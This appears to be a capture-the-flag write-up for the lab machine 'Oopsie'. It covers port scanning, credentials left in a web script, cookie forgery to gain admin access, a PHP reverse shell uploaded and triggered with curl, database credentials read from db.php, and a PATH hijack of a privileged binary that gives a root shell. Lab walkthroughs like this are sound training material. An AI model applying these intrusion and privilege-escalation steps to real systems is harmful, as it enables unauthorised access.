# Oopsie ## Enumeration A first nmap scan reveals some open ports: `sudo nmap -sC ` ``` # 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA) | 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA) |_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519) # 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Welcome ``` At the webserver the directory `/cdn-cgi` was listable. The directory itself could be found by fuzzing for it with ffuf. I found `/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js`, which contained some credentials: ``` admin MEGACORP_4dm1n!! 34322 admin admin@megacorp.com 8832 john john@tafcz.co.uk 86575 super admin superadmin@megacorp.com ``` ## Web Access and Insecure Cookie Abuse Logging in at the webserver at http\://\/cdn\_cgi/login with the credentials I found, there was a file upload feature, that seemed to require higher permissions of some "super admin". Since the page was PHP based and there was no session information in the URL, maybe there was a session cookie... I found the cookie, which was not a proper sessionID, but a custom string. In the public code of the /login/admin.php I found this: ```php if($_COOKIE["user"]==="34322" || $_COOKIE["user"]==="86575") ``` So I got privileged access to `http:///cdn_cgi/login/admin.php?content=uploads&action=upload` by loading that page with the cookie set to "34322". ## Shell Access and Pillaging At the upload page I could upload a PHP reverse shell and activate it with curl: ```bash curl http://10.10.10.28/uploads/php-reverse-shell.php ``` The shell was as the user www-data. Running `cat /var/www/html/cdn-cgi/login/db.php` yielded the following credentials: ``` conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage'); ``` As that user robert I could establish an ssh connection. ## Insecure Relative Path Checking the groups of the user I saw that robert had the group "bugtracker". With this group you can execute /usr/bin/bugtracker as root. A simple `strings bugtracker` shew me this: ``` ------------------ : EV Bug Tracker : ------------------ Provide Bug ID: --------------- cat /root/reports/ ;*3$" ``` I created the file /home/robert/soos/cat which is a script that starts /bin/bash. Then I exported the directory to the PATH, so that my version of cat is used when calling cat without an absolute path: ``` export PATH=/home/robert/soos:$PATH ``` Executing the bugtracker binary now, I could start a root shell.